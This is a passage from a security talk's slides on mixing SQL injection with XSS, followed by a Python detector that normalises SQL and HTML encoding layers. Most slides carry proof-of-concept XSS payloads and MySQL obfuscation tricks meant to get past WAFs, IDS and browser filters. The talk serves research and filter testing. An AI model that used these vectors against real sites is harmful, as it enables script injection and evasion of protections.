    - MySQL only ships two basic XML functions: UpdateXML() and ExtractValue()
    - PostgreSQL has far more advanced XML support
    SELECT xmlelement(name img,xmlattributes(1 as src,'alert(1)'as onerror))
    SELECT xmlforest(loWER('\x41'||'lert(1)') AS script);
    - And my favorite
    SELECT xpath('//text()', '<x:x>&#x3c;img\x20src=x onerror=alert(1);&#x2f;&#x2f;</x:x>', ARRAY[ARRAY['x', '']]);
  • 12. SQL Injection and XSS
    - There are more intersections for XSS and SQLI
    - „Remember“ the client side databases?
    - And the short lived Google Gears?
    - HTML5 and W3C Offline Web Applications 1.0 give us window.openDatabase()
    - SQL execution on the user agent
    - Currently supported by Chrome and Opera
    - Usually implemented using SQLite
  • 13. Code please
    <script type="text/javascript">
    openDatabase('',1,1,0).transaction(function($){
      $.executeSql('SELECT "\x61lert(1\u0029"', [], function($,results){
        for(i in results.rows.item(0)) eval(results.rows.item(0)[i])
      })
    })
    </script>
    - Selects the string "alert(1)"
    - And evaluates the result
  • 14. Short Roundup
    - The browsers speak SQL now
    - The server side DBMS can generate HTML and JavaScript
    - We already outsmarted NoScript and IE8 XSS filter
    - Not really a fair game though
    - Multi-layer attacks mean multi-layer obfuscation
    - In future webapps the client side DBMS will generate our XSS payload
    - But today we still have to trick the server side protection
    - Bypass IDS and WAF with a trigger
  • 15. Attackers like obfuscation
    - And why wouldn't they - right?
    - Obfuscation usually means concatenation
    - And a bit of encoding spice
    - But how to concatenate in SQL so no one will notice the attack?
    - Which operator to choose?
    - Everybody knows chr(), char() and double-pipe...
  • 16. In MySQL - none at all
    - MySQL doesn't need parentheses to concatenate
    - And doesn't know the double-pipe operator
    - Sorry mod_security...
    - But luckily MySQL accepts concatenation via whitespace
    SELECT "a" "d" "m" "i" "n"
    SELECT'a'"d"'m'"i"'n'
    - Or why not use an integer overflow in char()
    SELECT concat( char( x'70617373', b'1110111011011110111001001100100'))
  • 17. So again...
    - We can bypass the server side protection mechanisms
    - As well as client side tools
    - No parentheses or special operators needed on MySQL
    - We can also trick MySQL and the IDS with MySQL specific code
    SELECT--/*!500005,*//*!400004,*//*!300003,*/
  • 18. Back to the user agent
    - But what if no server side DBMS is involved in the attack
    - What if the client side database is being targeted
    - We still need to execute some JavaScript bypassing both the server side IDS and the client side security mechanisms
    - Let's have a look at some freaky examples
  • 19. Remember dataURIs?
    - The whole requested resource embedded in the URI
    - DataURIs work smoothly on Firefox, Opera and Chrome
    - But IE8 and 9 have problems
    - Some say the minimal dataURI support was just for ACID 2
  • 20. People say...
    - ...it's not possible to execute JavaScript via dataURI on IE
    - Do we agree on that? No we don't!
    <style> @import "data:,*%7bx:expression(write(2))%7D"; </style>
    <link rel="Stylesheet" href="data:,* %7bx:expression(write(4))%7d">
  • 21. And there's more
    - CSS expression() is believed to be dead on IE8
    - But it isn't
    - It's only disabled in standards mode
    - In case a recognized DOCTYPE is present
    - The new HTML5 doctype isn't
    - So this works: <!docytpe html> <div style="background:url('abc', x!=x=expression(write(2));)">
  • 22. And even worse...
    - HTML5 forces user agents to be more tolerant again
    - New tags, new attributes, new parsing rules
    - And tons of new features like the mentioned openDatabase()
    - Some nifty examples from the future
    <video/poster=javascript:alert(1)// Opera 10.5+
    <style>@import javascript:alert(1); // IE9 (!)
  • 23. Closing tags + free 0day
    - Another weird artifact has been reported for IE6 some years ago
    - It's attributes in closing HTML tags
    - Believed to be dead... but
    - This still works on all IEs
    <td>phoobar</td style=expression(write(1))>
    - And what about this?
    <style>*{background:url(foo!!- =expression(write(1));</style>
  • 24. Opera CSS XSS
    - Since Mozilla fixed the dataURI and cross domain problems with -moz-binding IE was believed to be unique
    - Unique regarding JavaScript execution via CSS
    - But Opera ships an artifact too
    <style>*{-o-link:'javascript:alert(1)';-o-link-source:current}</style>
  • 25. Now we have...
    - Server side SQL helping to circumvent client side XSS filters
    - Effective SQL obfuscation circumventing WAF and IDS
    - "Obfuscation-mash ups" using several layers
    - Quirky HTML triggers to execute the JS
    - Sounds like only one player is missing
    - Even more freaky markup obfuscation! Awesome! Now breathe..
  • 26. Meet Harold the markup ghoul
    This is Harold:
    1;--<?f><l ₩ :!!:x /style=`b&#x5c;65h0061vIor/ĸ :url(#def&#x61ult#time2)ö/';'` ₩ /onb egin= &#x5bµ=u00&#054;1le&#114t&#40&#x31)&# x5d&#x2f/&#xyŧ>
    - It's completely legitimate to call me a mad man now and say this is never gonna work
    - So - demo time: http://heideri.ch/jso/what???
  • 27. What... what is this?
    - It's a piece of markup – obfuscated to the max
    - Working on IE only – but all versions from 5 to 9
    - Based on the HTML+TIME API (What? Stuff like that still exists?)
    - Does your WAF know what to do with it?
    - Overall about 12-13 obfuscation steps
    - Buy me a beer later on and I will give you a full explanation :D
  • 28. Round Up
    - We are not living in web app = CRUD application times anymore
    - Modern webapps accept input from many channels
    - User input via HTTP is just one of them
    - API calls, RPC, DOM, Drag&Drop, file meta data & EXIF...
    - WAF/IDS as well as pentesters need to look into HTML5
    - New application structures and design patterns must be understood
    - Client and server versus rich-client and cloud
    - SQLite and NVP versus RDBMS
    - Massive client diversity via mobile devices
  • 29. Expectations and tasks
    - Fewer basic and reflective XSS
    - More out-of-band attacks and heavy obfuscation
    - We didn't even cover Flash and PDF
    - More JSON and E4X hijacking
    - SVG based attacks and rogue multimedia objects
    - Don't ignore the user agent
    - Understand client side obfuscation and multi-layer obfuscation
    - Don't trust filters. Ever.
    - We broke HTMLPurifier and most other markup filters some days ago with one single vector
    - And don't trust the cloud – it's a business model and not your buddy :D
  • 30. So what can I do?
    - Help with research and participation!
    - Communication and disclosure
    - For good!
    - But how?
  • 31. The Ultimate Cheatsheet
    http://heideri.ch/jso
  • 32. Ping us!
    - Add new vectors
    - Get a channel to speak to vendors
    - Most are more responsive than one might think
    - Use it for..
    - Your own scanner software
    - Your own local version
    - Whatever you want!
    - Open API in JSON
    - Multiple languages
    - Flexible payload
    - You need more? Tell us!
  • 33. Do what now?
    - Go here! http://code.google.com/p/html5security/
  • 34. Questions & Comments
    - Thanks very much for listening!
    - Wait - no goodies this time? Meh!!1
  • 35. Yaaaaaaay! Goodies!
    - Did you know Firefox has a DOM object called crypto?
    - PKI meets JavaScript
    - And another eval() for free!
    crypto.generateCRMFRequest( 'CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use' );
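Slides 8, 10 and 15 to 17 make one detection point: a WAF or IDS that matches on the raw request never sees the markup, because the SQL layer (hex literals, adjacent-literal concatenation, version comments) and the HTML layer (character references without semicolons, skipped whitespace and control bytes, percent-encoding) each hide it. The following Python is an added detector-side example, not code from the talk or from PHPIDS; it flattens both layers and reports what the browser would finally see. The sample inputs are copied from the slides, and every function name is my own.

```python
import html
import re
from urllib.parse import unquote

# Constructed samples, copied from the slides so the normaliser can be checked
# against them; they are decoded here for detection and never executed.
SQL_HEX = "SELECT 0x3C7363726970743E616C6572742831293C2F7363726970743E"
SQL_SPLIT = "SELECT/**/'<sc'\"rip\"'t>al'\"er\"'t(1)'\"</sc\"'ript>'"
SQL_ADMIN = "SELECT'a'\"d\"'m'\"i\"'n'"
ATTR_DATA_URI = ("d&#097t&#x0061: . &#x2c &#x25;  3  c s cri &#x00D; pt % 3 e "
                 "al\\u0065rt(1)%3c  /s &#x43 RI &#x009 P t>")

VERSION_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)  # MySQL runs the body
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)               # parser treats as space
HEX_LITERAL = re.compile(r"\b0x([0-9A-Fa-f]+)\b")
STRING_LITERAL = re.compile(r"'((?:[^'\\]|\\.|'')*)'|\"((?:[^\"\\]|\\.|\"\")*)\"")
MARKUP_MARKERS = ("<script", "onerror", "expression(", "javascript:")


def strip_mysql_comments(sql: str) -> str:
    """Keep the body of /*!NNNNN ... */ (MySQL executes it) and drop only the
    delimiters; a plain /* ... */ is whitespace to the parser and is removed."""
    sql = VERSION_COMMENT.sub(r" \1 ", sql)
    return PLAIN_COMMENT.sub(" ", sql)


def decode_hex_literals(sql: str) -> str:
    """0x3C73... is a string literal to MySQL; rewrite it as a quoted string."""
    def repl(m):
        try:
            text = bytes.fromhex(m.group(1)).decode("utf-8")
        except ValueError:            # odd digit count or not valid UTF-8
            return m.group(0)
        return "'" + text.replace("'", "''") + "'"
    return HEX_LITERAL.sub(repl, sql)


def unescape_literal(body: str, quote: str) -> str:
    """Undo MySQL string escapes: doubled quotes and backslash sequences."""
    table = {"n": "\n", "r": "\r", "t": "\t", "0": "\0"}
    body = body.replace(quote * 2, quote)
    return re.sub(r"\\(.)", lambda m: table.get(m.group(1), m.group(1)), body)


def string_literals(sql: str) -> list[str]:
    """Return the string values MySQL builds: adjacent literals separated by
    nothing or by whitespace are concatenated ('a' "d" 'm' -> 'adm')."""
    values: list[str] = []
    prev_end = None
    for m in STRING_LITERAL.finditer(sql):
        body, quote = (m.group(1), "'") if m.group(1) is not None else (m.group(2), '"')
        value = unescape_literal(body, quote)
        if prev_end is not None and sql[prev_end:m.start()].strip() == "":
            values[-1] += value       # whitespace-only gap: MySQL concatenates
        else:
            values.append(value)
        prev_end = m.end()
    return values


def html_normalize(value: str) -> str:
    """Undo what the browser tolerates in the next layer: character references
    with or without ';', whitespace and control bytes inside tag names and URL
    schemes, then percent-encoding. Deliberately over-approximates the parser."""
    text = html.unescape(value)
    text = re.sub(r"[\s\x00-\x1f]+", "", text)
    return unquote(text).lower()


def scan_sql(sql: str) -> dict:
    """Flatten the SQL layer, then push every resulting string through the HTML
    layer; a marker hit means the query can hand markup to the browser."""
    literals = string_literals(decode_hex_literals(strip_mysql_comments(sql)))
    hits = {mk for lit in literals for mk in MARKUP_MARKERS if mk in html_normalize(lit)}
    return {"literals": literals, "markers": sorted(hits)}


def scan_attribute(value: str) -> dict:
    """The same HTML-layer normalisation applied directly to an href/src/poster
    value, reporting which URI scheme it really resolves to."""
    norm = html_normalize(value)
    scheme = re.match(r"(javascript|data|vbscript):", norm)
    return {"scheme": scheme.group(1) if scheme else None,
            "markers": sorted(mk for mk in MARKUP_MARKERS if mk in norm)}
```

A real filter would feed the normalised literals and attribute values into its existing rules instead of the short marker tuple used here.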